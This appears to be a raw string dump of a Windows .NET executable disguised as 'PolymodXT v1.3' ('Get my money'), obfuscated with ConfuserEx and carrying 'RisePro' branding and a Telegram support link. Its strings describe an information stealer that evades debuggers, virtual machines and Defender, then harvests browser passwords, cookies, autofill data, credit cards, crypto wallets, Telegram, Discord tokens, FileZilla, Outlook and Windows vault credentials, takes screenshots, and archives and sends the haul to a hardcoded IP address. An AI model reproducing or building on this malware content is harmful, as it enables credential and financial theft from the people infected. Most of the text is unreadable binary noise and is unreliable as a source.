!This program cannot be run in DOS mode.
`.rsrc
@.reloc
Qkkbal
bD8MZ aJ
^Q*o%+
Rn@Z 4
Z V|e:a8
j^%&85
Z Wd,Ya8
Qc>Za8@
~rya8
ncKX%+
w0Z r)
dEP~Z ~h
as^Z `
qWkpZ ]
5 Za81
B#uZ @!xHa8s
;{' 8 %
kU%&80
H6:@%+
%2&D%&8
wZ =p8
Z }-mPa8
_b`}A
6RZZ d
Xjq^a%
2.L> o
Z &:2=a8`
Z B7e{a8
KEg(
KEg(%+
fme&%&8t
("@*%&8
-G2a8{
' Za8M
Y _bX
Y _bXT
rmZ uf
c5e %+
XT H=
dA1 Za8
||%&8R
3zxZa8#
KA`kZ M
|Z wj[
Z 2s'ha+
CU?T+
TuUa8t
f)ia8\
,b%&8@
8OUzZ P
nc:Z 2
@XP%&8
Z (zA+a8
Jx%&84
~F>HZ f/(
L41/Z
Z gl',a8
?CO%&8
Z OWVEa8g
Q1|*%&8O
(Nr`Z w
Z +]Ha8
Z mup?a8
*]%&8@
y&ea8&
Ak)gZ .
;|LZa+
fZ LPN
P}yZa+
/{a%&+
-M Ndbb
}gVZ ]
h>sa8H
G *Ab'a%
F,Za8V
*Ab'a%
.aI5%&
q,%&8e
*Ab'a%
`ex{Z
G%iZ N<1]a8
3@ @oM
LAT]Z
OVZ :0
Q?t~%+
,8 deN
,[ qHO7
f?}3Za8S
Z P@:ta8C
<Z ^frMa+
o}]z%&
'B).82
2H xgv# g
/qH~%+
7Z Tg0
* FgDz8
> ~Q\2a%
bxg1Z
5Htc+
KZ aSE
ga%&8\
[jiX}5
*H 9\e{a%
] 9\e{a%
46\ +
Y 9\e{a%
CMI%&+
R#c5Z Ac
?JJZa8
@cm%&8
g*`k%&
*W=w%+
d4"Za8
2-^Ka%
vsZa8j
fNXGZ
IIZ t5|
yhZ }eE
]Z B'q
,S$P%+
z\ma83
MM5i8h
Fl:XZ ~G
%+E{%&+
P<{_%+
V(Z Z5
,;cZa+
&6wZa8g
qbBZa8q
" =^E=
[iO%+
vE^2%+
RL%&86
:d+Z $
O<O!%&8
-9 jg>g )
ncb@%&
vf3?Z
qn;Q%+
5qZa8Y
ak;@Za8
._AZ .
,: ;<9
P0=k%&
# $^E$
n(kF%+
M"M{%+
)hNx%+
^D2?%+
# QU0%Za+
oQ\:%+
\Za8Z
# #^E#
IZ tT,`a8>
's?E%&
-9 =j)
Vqqi%+
Zc=M%+
k,m*%&
7(Z lq
- W4>AZ
?LZ yv
,: ^<0
jphZ ,
*,: 5Lz
dK=Z qLF[a8M
h&O0Z -
+Z FHM
>/Z vG
ZVZa8q
B|%E%&
%Znia%
oZa8X
4V7.%+
PY%&8=
^H}e%+
2q%&8W
d7Za8<
aH%&8C
6K'hZ
Bws%&8
o*Z ,l]Qa8
.v< %+
`HZa8J
R:%&8(
|kFZa8g
NWia%&
!7Z fS
Kas3Z
,: @8-
b4Za8U
a<|MZ
[#\[%+
1mZa8`
M-Za8n
z{s7Za8
t]%&8{
8a4Za8@
+ 1*Za8
+ H4SOZa8
+ i2'Z
8'cg%&
+ O6XoZ
k(@)%&
08"Za8
VDzj%+
GJIP%&
`Z >'d,a8
Z N[yoa8
Z *&_Ra8
p~^[
_~%&8|
Q6Za84
*3%&8q
Z '^u|a8
%THS%+
%THS8
%THS%&8n
YwZ , v
Z 7;eba8s
* G]%+
Y 3x%+
8<:Za8
?~%&8O
%CPm%+
cs'>Za8+
N42(8
Z n#)-a8
?~%&8P
3\sUZ
+Z r43
YqVZa+
wtZ ^q
gOh
|yXZ 1}
INZa8T
fv1a8n
nA|dZ
E} .Z _C.Za8c
"B-Z MP
B,Z SM1
1HZD%+
B%=VZ b
;G)Za8j
Q .Hq[8)
Z `bn[a8
vuZZa8
$Z 0h
%H%&86
0"g%&8
zN^Za8U
[Z=a8)
Z lO*%a8q
Z &0.Xa8
qZla8S
feZa8(
j"$g%+
1*|kZ J
- sOP~a%
f sOP~a%
Bf sOP~a%
Bf%&8@
d sOP~a%
lA sOP~a%
b sOP~a%
1vV sOP~a%
2Z G70ea8
@ %&8G
*{Z *"A
wN`v8B
31*w W
!ZZA W
{JZ }`
!ZZA%+
HiZa8f
n(fZa8
^\EZa8P
6VPa89
b=lhZ
>qk!%&
AZ 7jU.a8
Z L8Rra+
BHEa8v
+T d;fB
d;fB%&+
@G7a8Z
pDAG%+
fCdd
YnZa8&
gS%&8Z
Z XNfaa+
%>lZ eY'
gZ waz
?Z YZrIa8
Z [cE5a+
xk}Z 34
ar|/Z
Wuk%+
Dzp%&+
!w:%&8b
KrZp%&
Z = $^a8
\`e>8
Eh7Z k
sw(%&8<
A#Vw%+
* nm-88
6 y3A9Z
6 +^E+
>fHY%&
wwGa8c
R_kr%&
AT+a8w
(Za8V
x~}Za8
6 R8lYZa87
%ROT%+
v_3Za8^
Z \bG\a8
%tz{%+
6 gZ%.Za8
y~lZa8
-:c.%+
$Z M;%Ga8
$A9 %+
!{Za8g
@9MyZ
wTzWZ
-yZ /f
{$%&8r
U.ZZ T
mw<jZ
* >%&8
7FXQa%
j 7FXQa%
n<[,
@Ylr8=
7}_f%+
J1Za8v
\AN|%&84
5AG[%&
68>6Z
vRZ <<H
Z Sd2 a8
TwDa8o
'iZ 6}
V5P Z
-6\ ~K
#3kw%+
=!"%&8(
W0iA ~K
HDshZ
u=qZ @U
?(},Z ?
BZ w`G
I*Ug+
Z N7A_a8I
+Z #[)
Z ;`(1a8
{eaHZ c
Z *1HWa8
Ljr%&8r
KsVa8m
>kNZ c
Z h`;Qa8
!!@p
HZ JDt
sGh 3gZ
\"%&8;
/l%a8N
/wG7%&
M7?F8v
`G%&8^
&t<a8C
-U qS{
KSZa8W
qgbo%&
97Za8^
Z $Q12a8
)xj%&
'|IZa8?
U$@q+
)?c(Z
P'3aZ P
yQIZ #
8}4Za8
(qk~Za8B
X,!pZ -\
/Q=7%&8
HZ uwM
Z },SOa8d
<Z r`1ia+
y4}(%&
%A,T%&
Z r)rQa8p
[X@Z a
MqZ rb
v4.0.30319
#Strings
"%"7"u"
#;$B$K$q$
$*%3%e%k%
&7'@'Y'
="S"d"
-M.[.O0u0
<>9__33_0
<>9__27_0
Version11
8A09971C787BEEE474BD54896939731E2A3355B6E32B43DBAD8C01B16989FA81
Nullable`1
IComparable`1
IEnumerable`1
IOrderedEnumerable`1
Predicate`1
CallSite`1
Stack`1
Action`1
Comparison`1
IEqualityComparer`1
IEnumerator`1
ArraySegment`1
List`1
get_Item1
Microsoft.Win32
ReadUInt32
ToUInt32
ReadInt32
WriteInt32
ToInt32
GetInt32
SQLITE_CONFIG_GETPCACHE2
SQLITE_CONFIG_PCACHE2
Func`2
Tuple`2
KeyValuePair`2
ConcurrentDictionary`2
get_Item2
sqlite3_trace_v2
sqlite3_prepare_v2
sqlite3_close_v2
sqlite3_open_v2
Func`3
Tuple`3
sqlite3
get_Item3
ToUInt64
ReadInt64
ToInt64
GetInt64
sqlite3_bind_int64
sqlite3_column_int64
GetTickCount64
Func`4
Tuple`4
get_Item4
getMD5
get_Item5
ReadUInt16
ToUInt16
ReadInt16
ToInt16
GetInt16
12F3E0576D447EB37B36D82BA0C1C5481B8F0D12FDC70347CE4A076B229D4C86
459CB7F92764CF14CEDC73AC8441F9632C2F3C921D6548A7F0672D182B2F13F6
Tuple`6
get_Item6
pVaultItem7
9BF8B8F5278471CADD7855C9B61F9E373EE074000698135096C3092424366308
6DE05E636E501D77519EBF250AE7AB27AD93CB542C0B3E8CA130BC5765E4AC68
get_UTF8
pVaultItem8
<Module>
GetCurrentHwProfileA
CredEnumerateA
C133E473E5E653C5C4AEDB8BCC1C1A3A44D384FC0B6C0FCF04672B1B325EC01B
FCFE62B24FA31A5DF16A6355673DC67E3634638DF5134C2E8A9A4D498D54857B
CD2382355D9226A8C1CEEB9A9C63F823E230005D8BCBB8CC159DB065D7FD954C
CreateCompatibleDC
ReleaseDC
GENERIC
SQLITE_CONFIG_GETMALLOC
SQLITE_CONFIG_MALLOC
SQLITE_CONFIG_SINGLETHREAD
SQLITE_CONFIG_MULTITHREAD
USER_LOADED
CONNECTED
SQLITE_CONFIG_SERIALIZED
PlatformID
pClassID
GetClassID
get_FormatID
DOMAIN_VISIBLE_PASSWORD
DOMAIN_PASSWORD
SQLITE_CONFIG_LOOKASIDE
SQLITE_CONFIG_PAGECACHE
SQLITE_CONFIG_GETPCACHE
SQLITE_CONFIG_PCACHE
SQLITE_TRACE_PROFILE
FILETIME
SQLITE_CONFIG_NONE
SQLITE_TRACE_CLOSE
DOMAIN_CERTIFICATE
SQLITE_CONFIG_WIN32_HEAPSIZE
SQLITE_CONFIG_MMAP_SIZE
F287F1380EB445B32353E2806270F282A7CA37F5A2770C58F4A011F1328E334F
SQLITE_CONFIG_SQLLOG
SQLITE_CONFIG_LOG
SQLITE_CONFIG_SCRATCH
get_ASCII
SQLITE_CONFIG_URI
SQLITE_CONFIG_COVERING_INDEX_SCAN
System.IO
SQLITE_CONFIG_HEAP
ThrowExceptionForHR
CRED_ENUMERATE_VALID_FLAGS
CRED_ENUMERATE_ALL_CREDENTIALS
CRED_ENUMERATE_SESSION_CREDENTIALS
OpenVMS
SQLITE_CONFIG_MEMSTATUS
ALTMVS
NonPagedPoolCacheAlignedMustS
SQLITE_TRACE_STMT
PolymodXT
SQLITE_TRACE_ROW
SQLITE_CONFIG_GETMUTEX
SQLITE_CONFIG_MUTEX
value__
GetSchema
System.Data
pUserData
userData
CryptUnprotectData
NotADb
mscorlib
sqlite3_bind_blob
sqlite3_column_blob
System.Collections.Generic
HeapAlloc
get_Id
SchemaId
get_CanRead
ResumeThread
CreateThread
TerminateThread
get_CurrentThread
TryAdd
NonPagedPoolMustSucceed
get_IsAttached
Locked
Interlocked
NonPagedPoolCacheAligned
IsDefined
ElementType_Undefined
Stored
get_IsClosed
Unused
get_IsAllocated
get_RecordsAffected
get_Connected
SaveCompleted
ThrowIfCancellationRequested
get_IsCancellationRequested
dwReserved
System.Collections.Specialized
get_IsSynchronized
ElementType_Sid
ElementId_PackageSid
SafeHandleZeroOrMinusOneIsInvalid
ElementType_Guid
get_Guid
GetGuid
piShowCmd
GetShowCmd
SetShowCmd
ReadToEnd
ElementId_AppEnd
IDbCommand
CreateDbCommand
CreateCommand
PathAppend
post_send
get_Kind
DateTimeKind
RegistryValueKind
get_Second
NotFound
set_Method
method
Replace
IsNullOrWhiteSpace
IsWhiteSpace
get_StackTrace
Notice
GetService
CreateInstance
get_DataSource
get_UpdatedRowSource
set_UpdatedRowSource
UpdateRowSource
ElementId_Resource
LoadResource
FindResource
SizeofResource
LockResource
errorCode
get_StatusCode
HttpStatusCode
FileMode
CompressionMode
dwMode
base64Decode
get_Unicode
base64Encode
bytesToEncode
sqlite3_errcode
CredFree
HeapFree
get_Message
pMessage
AddRange
OnStateChange
CompareExchange
System.Net.Cache
SharedCache
EndInvoke
BeginInvoke
GetSchemaTable
DataTable
get_IsNullable
set_IsNullable
IEnumerable
IDisposable
get_DesignTimeVisible
set_DesignTimeVisible
ElementType_Double
ToDouble
GetDouble
sqlite3_bind_double
sqlite3_column_double
GCHandle
get_Handle
RuntimeFieldHandle
SafeHandle
GetModuleHandle
RuntimeTypeHandle
ReleaseHandle
CloseHandle
GetTypeFromHandle
SetHandle
handle
ToSingle
DownloadFile
ReadIniFile
GetCurFile
pszFile
IsInRole
WindowsBuiltInRole
Console
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
sourceName
get_FileName
set_FileName
GetFileName
ppszFileName
get_MachineName
GetDataTypeName
get_EnglishName
get_FullName
destinationName
get_UserName
get_ParameterName
set_ParameterName
get_ProcessName
GetName
cchMaxName
subKeyName
GetDirectoryName
pszName
sqlite3_column_name
ToFileTime
GetDateTime
get_LastWriteTime
GetCreationTime
GetLastAccessTime
ReadLine
WriteLine
PathCombine
LocalMachine
get_None
get_DbType
set_DbType
ResetDbType
get_IsGenericType
get_FieldType
GetProviderSpecificFieldType
GetFieldType
get_CommandType
set_CommandType
ComInterfaceType
ChangeType
ValueType
GetUnderlyingType
SecurityProtocolType
ExpressionType
DontUseThisType
GetType
SocketType
GetElementType
set_ContentType
get_PropertyType
sqlite3_column_type
content_type
sqlite3_column_decltype
FileShare
Prepare
Compare
System.Core
PtrToStructure
get_CurrentUICulture
set_CurrentUICulture
get_InvariantCulture
Capture
get_OrdinalIgnoreCase
get_Database
ChangeDatabase
get_Response
HttpWebResponse
GetResponse
Dispose
TryParse
Misuse
X509Certificate
Truncate
Create
MulticastDelegate
get_State
ConnectionState
TcpState
Delete
CallSite
ReadWrite
ElementType_Attribute
DynamicAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
GuidAttribute
UnverifiableCodeAttribute
NeutralResourcesLanguageAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
InterfaceTypeAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
GetCustomAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
RiseProAttribute
IgnoreDataMemberAttribute
DefaultMemberAttribute
UnmanagedFunctionPointerAttribute
FlagsAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
get_Minute
ReadByte
WriteByte
GetByte
get_Value
set_Value
GetProviderSpecificValue
get_HasValue
ContainsValue
TryGetValue
SetValue
RegistryHive
EndReceive
BeginReceive
get_IsAlive
PathIsRelative
get_IsPrimitive
Resolve
TryRemove
PolymodXT.exe
get_Size
set_Size
get_IsFixedSize
sqlite3_finalize
Resize
SizeOf
IndexOf
ElementId_Tag
HasFlag
TooBig
sqlite3_config
get_Png
System.Threading
GetEncoding
System.Drawing.Imaging
sqlite3_backup_remaining
System.Runtime.Versioning
Warning
get_SourceColumnNullMapping
set_SourceColumnNullMapping
FromBase64String
ToBase64String
ElementType_String
RtlUnicodeStringToAnsiString
GenerateRandomString
get_ConnectionString
set_ConnectionString
hexToString
BrandingFormatString
GetString
Substring
System.Drawing
msg_to_log
sqlite3_errmsg
BinarySearch
exCatch
IsMatch
Mismatch
ComputeHash
sqlite3_backup_finish
filePath
SetRelativePath
cchIconPath
pszIconPath
GetTempPath
SHGetKnownFolderPath
GetFolderPath
GetPath
SetPath
cchMaxPath
get_PrimaryScreenWidth
get_Length
set_Length
SetLength
set_ContentLength
length
EndsWith
StartsWith
get_Month
get_Depth
PtrToStringUni
PtrToStringAnsi
AsyncCallback
RemoteCertificateValidationCallback
get_ServerCertificateValidationCallback
set_ServerCertificateValidationCallback
TimerCallback
callback
Rollback
RegistryKeyPermissionCheck
StoredBlock
PresentationFramework
NonExtendedMask
AllocHGlobal
FreeHGlobal
get_Local
ElementId_Illegal
Marshal
GetDecimal
Normal
GetOrdinal
ordinal
Internal
System.Security.Principal
WindowsPrincipal
SequenceEqual
pszPathRel
Cancel
System.ComponentModel
RequestCacheLevel
get_IsolationLevel
SetupDiGetDeviceInterfaceDetail
gdi32.dll
advapi32.dll
kernel32.dll
user32.dll
Crypt32.dll
winbrand.dll
setupapi.dll
psapi.dll
shlwapi.dll
ntdll.dll
IsDBNull
sqlite3_bind_null
set_SecurityProtocol
NonPagedPool
sqlite3_file_control
sqlite3_sql
FileStream
GetResponseStream
DeflateStream
get_EndOfStream
GetRequestStream
MemoryStream
get_Param
Tandem
get_Item
set_Item
get_Is64BitOperatingSystem
HashAlgorithm
Random
get_Platform
get_IsEnum
ElementType_Boolean
GetBoolean
TimeSpan
CancellationToken
CantOpen
X509Chain
AppDomain
get_CurrentDomain
SeekOrigin
get_SourceColumn
set_SourceColumn
piIcon
GetExtension
get_OSVersion
get_SourceVersion
set_SourceVersion
set_ProtocolVersion
HttpVersion
get_ServerVersion
RtlGetVersion
DataRowVersion
System.IO.Compression
GetIconLocation
SetIconLocation
ObjectBasicInformation
ObjectTypeInformation
System.Net.NetworkInformation
NtQuerySystemInformation
TcpConnectionInformation
destination
CopyPixelOperation
UnaryOperation
BinaryOperation
CancellationTokenRegistration
System.Globalization
System.Runtime.Serialization
op_Subtraction
set_Transaction
IDbTransaction
get_DbTransaction
set_DbTransaction
BeginDbTransaction
BeginTransaction
System.Reflection
ICollection
NameValueCollection
MatchCollection
WebHeaderCollection
get_DbParameterCollection
ManagementObjectCollection
get_Connection
IDbConnection
get_DbConnection
set_DbConnection
get_Direction
set_Direction
ParameterDirection
op_Addition
GetGenericTypeDefinition
get_Position
set_Position
CallingConvention
COMException
DbException
WebException
add_UnhandledException
ObjectDisposedException
NotImplementedException
NotSupportedException
ArgumentOutOfRangeException
IndexOutOfRangeException
ArgumentNullException
ApplicationException
InvalidOperationException
ArgumentException
InvalidCastException
GetDescription
SetDescription
System.Data.Common
StringComparison
SocketShutdown
Unknown
CompareTo
CopyTo
ImageCodecInfo
FieldInfo
FileInfo
TimeZoneInfo
GetCultureInfo
DriveInfo
FileSystemInfo
GetSystemInfo
SerializationInfo
MemberInfo
ConstructorInfo
DateTimeFormatInfo
get_InvariantInfo
CSharpArgumentInfo
set_StartInfo
ProcessStartInfo
DirectoryInfo
PropertyInfo
GetProcessHeap
CreateCompatibleBitmap
FromHbitmap
sqlite3_step
sqlite3_backup_step
ElementType_TimeStamp
Microsoft.CSharp
System.Linq
get_Year
GetChar
ExecuteScalar
InvokeMember
GetMember
fRemember
HttpRequestHeader
IDataReader
ExecuteDbDataReader
GetDbDataReader
ExecuteReader
StreamReader
TextReader
BinaryReader
IFormatProvider
DbConnectionStringBuilder
SpecialFolder
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
Encoder
GetBuffer
ServicePointManager
ElementType_Integer
ElementType_UnsignedInteger
Debugger
ManagementObjectSearcher
UnhandledExceptionEventHandler
sqlite3_progress_handler
ToUpper
StringComparer
set_Referer
referrer
CurrentUser
isWindows8OrGreater
CreateDbParameter
EncoderParameter
GetParameter
SetParameter
StreamWriter
TextWriter
BinaryWriter
GetDelegateForFunctionPointer
ToPointer
BitConverter
Register
ToLower
answer
sourceDir
destDir
pszDir
CommandBehavior
ElementId_Authenticator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
Activator
.cctor
GetConstructor
Monitor
StructureToPtr
UIntPtr
ReadIntPtr
FromIntPtr
ToIntPtr
sqlite3_errstr
wcsstr
get_Hour
System.Diagnostics
GetFields
getCurrentTimeSeconds
get_TotalSeconds
get_TotalMilliseconds
FromMilliseconds
SetupDiEnumDeviceInterfaces
withSpaces
System.Runtime.InteropServices
System.Runtime.CompilerServices
FormatterServices
System.Resources
DebuggingModes
DynamicTrees
StaticTrees
remainingPages
totalPages
sqlite3_total_changes
Matches
cookies
GetDirectories
GetFileSystemEntries
GetIPGlobalProperties
GetProperties
Microsoft.Win32.SafeHandles
GetFiles
DateTimeStyles
NumberStyles
GetValueNames
GetSubKeyNames
ReadLines
System.Runtime.InteropServices.ComTypes
GetProcesses
System.Security.Cryptography.X509Certificates
get_Attributes
FileAttributes
ReadBytes
decodedBytes
base64DecodeBytes
ReadAllBytes
GetBytes
sqlite3_column_bytes
GetProviderSpecificValues
GetValues
GetDrives
fFlags
BindingFlags
CSharpArgumentInfoFlags
CSharpBinderFlags
SocketFlags
dwFlags
StateChangeEventArgs
UnhandledExceptionEventArgs
pszArgs
getCurrentTimeMillis
Equals
Contains
System.Linq.Expressions
System.Text.RegularExpressions
System.Collections
GetActiveTcpConnections
StringSplitOptions
get_Chars
GetChars
get_Headers
GetImageDecoders
RuntimeHelpers
SystemParameters
EncoderParameters
SslPolicyErrors
get_Hours
set_PriorityClass
ProcessPriorityClass
FileAccess
GetExitCodeProcess
OpenProcess
GetCurrentProcess
IPAddress
GetProcAddress
System.Net.Sockets
set_Arguments
GetGenericArguments
GetArguments
SetArguments
get_CanRaiseEvents
get_Exists
CheckRegistryKeyExists
SetupDiGetClassDevs
get_HasRows
System.Windows
get_Keys
RemoveAt
Concat
AppendFormat
ImageFormat
get_DriveFormat
GetFloat
ParseExact
GetUninitializedObject
WaitForSingleObject
ManagementBaseObject
NtDuplicateObject
DeleteObject
get_ExceptionObject
SelectObject
ManagementObject
NtQueryObject
object
Collect
Connect
System.Net
get_Target
Socket
sqlite3_reset
get_Offset
get_BaseUtcOffset
get_PrimaryScreenHeight
op_Explicit
IsDigit
Commit
sqlite3_backup_init
BitBlt
hVault
FirstOrDefault
IAsyncResult
NextResult
result
set_UserAgent
WebClient
System.Management
Environment
Component
hwndParent
get_Current
GetCurrent
System.Collections.Concurrent
IsProcessorFeaturePresent
CreateEvent
SetEvent
ResetEvent
sqlite3_bind_int
Constraint
IPEndPoint
get_RemoteEndPoint
get_LocalEndPoint
get_Count
get_FieldCount
get_VisibleFieldCount
GetByteCount
sqlite3_column_count
sqlite3_backup_pagecount
get_SyncRoot
set_Accept
accept
Interrupt
sqlite3_interrupt
Corrupt
ThreadStart
TrimStart
ElementId_AppStart
Insert
Convert
ElementType_Short
ElementType_UnsignedShort
ElementType_Last
HttpWebRequest
request
GetIDList
SetIDList
GetKeyboardLayoutList
Persist
get_CommandTimeout
set_CommandTimeout
set_ReceiveTimeout
get_ConnectionTimeout
sqlite3_busy_timeout
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
get_CommandText
set_CommandText
ReadAllText
WriteAllText
sqlite3_bind_text
sqlite3_column_text
GetThreadContext
StreamingContext
RegistryView
get_Now
get_UtcNow
GetConsoleWindow
set_CreateNoWindow
ShowWindow
GetModuleFileNameEx
GetIndex
sqlite3_bind_parameter_index
OrderBy
get_Day
get_Array
ElementType_ProtectedArray
ElementType_ByteArray
ToByteArray
InitializeArray
ToArray
get_IsArray
set_CachePolicy
RequestCachePolicy
get_IsReady
get_Key
CreateSubKey
OpenSubKey
OpenBaseKey
ContainsKey
RegistryKey
sqlite3_key
GetHotkey
SetHotkey
pwHotkey
System.Security.Cryptography
get_AddressFamily
get_IsReadOnly
sqlite3_db_readonly
IDictionary
LoadLibrary
FreeLibrary
ExecuteNonQuery
Memory
get_DbProviderFactory
CreateDirectory
GetWorkingDirectory
SetWorkingDirectory
set_CurrentDirectory
CopyDirectory
Registry
get_Capacity
Quality
op_Equality
op_Inequality
System.Security
System.Net.Security
ElementId_Identity
WindowsIdentity
IsNullOrEmpty
IsDirty
&Confuser.Core 1.7.0-alpha.4+657fb58dcf
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
PolymodXT v1.3
Get my money
Polymod Inc.
PolymodXT
Copyright
2021
$33648d89-b00c-47ef-9100-1c5557768c3a
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
$00021401-0000-0000-C000-000000000046
$0000010c-0000-0000-C000-000000000046
$0000010b-0000-0000-C000-000000000046
$000214F9-0000-0000-C000-000000000046
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
'&0'9*?+AWClD
#"0/1/2/3/4/5/6/7/8/9/?>@>A>B>FEGEHEIEJEKELEMENEOEQPRPSPTPUPXWYWZW[W\W]W^W_Wa`b`c`edfdgdhdidmlnlqprpsptputvpwpxpypzp{p|p}p~p
ReadBytes routine is missing
WriteBytes routine is missing
RewindStream routine is missing
Adjust nodes failed
Inconsistent bl_counts!
catch CreateArchive
catch OpenArchive
catch Compress
catch SaveDirectoryPath
catch Delete
catch SaveArchive
Delete file: Read file header error
Delete file: Read first block error
Delete file: ZIP signature in error
Delete file: read file block error
Duplicate file name
No support for files over 4GB
Central directory is empty or in error
Central directory empty
No support for multi-disk ZIP file
Directory name must have a slash
File directory signature error
ZIP file is too short
Invalid ZIP file (No central directory)
Invalid file name
CommandType must be Text.
Connection must be Open; current state is {0}.
Connection property must be non-null.
CommandText must be specified
The transaction associated with this command is not the connection's active transaction.
isolationLevel
Specified IsolationLevel value is not supported.
BEGIN IMMEDIATE
Connection String Data Source must be set.
Cannot Open when State is {0}.
pragma journal_size_limit={0}
pragma temp_store={0}
JournalSizeLimit
pragma mmap_size={0}
pragma page_size={0}
Synchronous
_MmapSize
pragma synchronous={0}
pragma journal_mode={0}
PersistWal
pragma foreign_keys = on
pragma cache_size={0}
Source database is not open.
destination
destinationName
pages must not be 0.
sourceName
Destination database is not open.
Cache Size
Data Source
Default Timeout
Foreign Keys
FailIfMissing
Journal Mode
Page Size
Password
Read Only
_TempStore
Invalid value
Cannot convert {0} to bool.
ordinal
value must be between 0 and {0}.
Cannot convert {0} to byte.
bufferOffset + length cannot exceed buffer.Length
length
Cannot convert {0} to bytes.
Cannot convert {0} to short.
Cannot convert {0} to int.
Cannot convert {0} to long.
Cannot convert {0} to double.
Cannot convert {0} to single.
The column name '{0}' does not exist in the result set.
The data type name '{0}' is not supported.
There is no current result set.
Read must be called first.
yyyy-MM-dd HH:mm:ss.FFFFFFF
yyyy-MM-dd HH:mm:ss.FFFFFFFK
bigint
boolean
datetime
double
integer
single
string
varchar
longvarchar
THHmmssK
THHmmK
HH:mm:ss.FFFFFFFK
HH:mm:ssK
HH:mmK
yyyy-MM-dd HH:mm:ssK
yyyy-MM-dd HH:mmK
yyyy-MM-ddTHH:mm:ss.FFFFFFFK
yyyy-MM-ddTHH:mmK
yyyy-MM-ddTHH:mm:ssK
yyyyMMddHHmmssK
yyyyMMddHHmmK
yyyyMMddTHHmmssFFFFFFFK
THHmmss
HH:mm:ss.FFFFFFF
HH:mm:ss
yyyy-MM-dd HH:mm:ss
yyyy-MM-dd HH:mm
yyyy-MM-ddTHH:mm:ss.FFFFFFF
yyyy-MM-ddTHH:mm
yyyy-MM-ddTHH:mm:ss
yyyyMMddHHmmss
yyyyMMddHHmm
yyyyMMddTHHmmssFFFFFFF
yyyy-MM-dd
yyyyMMdd
yy-MM-dd
{0}: {1}
SqliteStatementList ref count decremented below zero.
There is no active transaction.
Already committed or rolled back.
This is not the active transaction.
COMMIT
ROLLBACK
Can't roll back nested transaction.
default
171.22.28.214
detect debugger
tempAVS
defender
check dirs
create dirs
sqlite3.dll
connect
tempCMS
detect vm
get sqlite
catch decrypt sqlite
decrypt sqlite
get settings
grab_screen
grab_tg
grab_ds
grab_wallets
grab_ihistory
started threads
vault init
Vault_IE
logins
WindowsCredentials
windows cred
vault passwords
vault fin
Outlook
outlook
catch windows cred
after windows cred
catch join browser threads
browsers
catch save info
save info
start saving
catch saving
saving
loader
sent archive
falied create folder Vars.pak_directory
after archive
failed create archive
created archive
screenshot.png
catch save screen
FileZilla
Plugins
IndexedDB
Wallets
catch save pluginscrypto
catch save tg
failed create history_dir
History
IsNullOrEmpty
ContainsKey
failed create cc_dir
ToString
expiration_month
expiration_year
exp_year
nickname
card_number
exp_month
last_four
name_on_card
billing_address_id
**** **** **** {0}
Name:
Nickname:
Month:
Year:
Card:
Address:
catch save historyCC
Autofill
failed create autofill_dir
Downloads
failed create downloads_dir
catch save autofill
Cookies
failed create cookies_dir
domain
httpOnly
secure
expirationDate
catch save cookies
passwords.txt
password
Storage:
Login:
Password:
profile
discord.txt
UserName:
E-MAIL:
Token:
foxmail.txt
catch save passwords
53F56307-B6BF-11D0-94F2-00A0C91EFB8B
information.txt
Version:
Date:
ddd MMM dd HH:mm:ss yyyy
Unknown
SOFTWARE\Microsoft\Cryptography
MachineGuid
MachineID:
GUID:
SELECT * FROM Win32_LogicalDisk WHERE DeviceID = '
VolumeSerialNumber
Work Dir:
Path:
%WINDOWS_LONG%
Location:
HWID:
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
Windows:
Keyboard Languages:
Local Time:
d/M/yyyy H:mm:ss
TimeZone: UTC{0}
[Hardware]
Computer Name:
User Name:
Display Resolution: {0}x{1}
Display Language:
SELECT * FROM Win32_Processor
Processor:
CPU Count:
NumberOfLogicalProcessors
SELECT * FROM Win32_PhysicalMemory
Capacity
RAM: {0} MB
SELECT * FROM Win32_VideoController
VideoCard #{0}: {1}
[Processes]
{0} [{1}]
[Software]
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
DisplayName
DisplayVersion
Unhandled exception occurred
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%
%%%%%%%%%
%%%%%%%
%%%%%%%%%%%
%%%%%%%%%
%%%%%%%%%
%%%%%%%%%
%%%%%%%%%
%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Telegram: https://t.me/RiseProSUPPORT
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
RisePro
Telegram: https://t.me/RiseProSUPPORT
SOFTWARE\Policies\Microsoft\Windows Defender
